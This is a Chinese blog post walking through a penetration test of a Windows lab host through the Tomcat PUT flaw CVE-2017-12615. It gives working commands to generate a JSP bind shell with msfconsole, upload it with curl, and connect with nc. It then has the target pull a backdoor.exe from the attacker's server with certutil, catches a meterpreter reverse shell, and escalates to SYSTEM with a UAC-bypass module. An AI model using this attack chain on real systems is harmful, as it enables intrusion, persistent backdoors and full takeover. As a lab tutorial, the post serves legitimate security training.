一次windows渗透测试


windows内核提权实战

kali IP: 172.16.10.111

靶机IP: 172.16.10.180

2021-05-06自搭环境,漏洞为Tomcat PUT (cve-2017-12615)

msf使用tomcat_jsp_upload_bypass模块

手工复现

对Web应用漏洞扫描探测

image-20210506212208824

发现服务的HTTP method方法中允许PUT,DELETE,允许客户端保存文件至服务器上

生成jsp反弹木马

┌──(root💀kali)-[~]
└─# msfconsole 
msf6 > use payload/windows/shell_bind_tcp
msf6 payload(windows/shell_bind_tcp) > set lport 4449
msf6 payload(windows/shell_bind_tcp) > generate -f jsp -o shell.jsp
[*] Writing 149075 bytes to shell.jsp...

上传jsp木马

使用curl,通过PUT方式上传/test.jsp/文件

curl -X PUT http://172.16.10.180:8080/test.jsp/ -d @shell.jsp

image-20210506212432604

访问Web木马

image-20210506213004651

使用nc连接

nc 172.16.10.180 4449

image-20210506213049337

反弹shell

在C盘下创建back目录

chcp 437        //将编码改为英文,不会出现乱码
cd c:\
mkdir back
cd c:\back

image-20210506213421968

上传backdoor.exe后门

┌──(root💀kali)-[~]
└─# msfpc windows 172.16.10.111

image-20210506213546472

python快速开启http服务

python3 -m http.server 8180

image-20210506213906822

靶机远程下载backdoor.exe

certutil -urlcache -split -f http://172.16.10.111:8180/backdoor.exe

image-20210506214012023

kali开启监听

──(root💀kali)-[/home/sheng]
└─# msfconsole -r windows-meterpreter-staged-reverse-tcp-443-exe.rc

image-20210506214303446

靶机执行backdoor.exe

c:\back>backdoor.exe
backdoor.exe

image-20210506214355334

得到shell

image-20210506214422916

提权

使用msf中post/multi/recon/local_exploit_suggester模块查看可利用的提权模块

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > exploit

image-20210506214605716

使用exploit/windows/local/bypassuac_eventvwr模块进行提权

image-20210506214731844

得到system权限,提权成功


文章作者: Sheng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Sheng !
  目录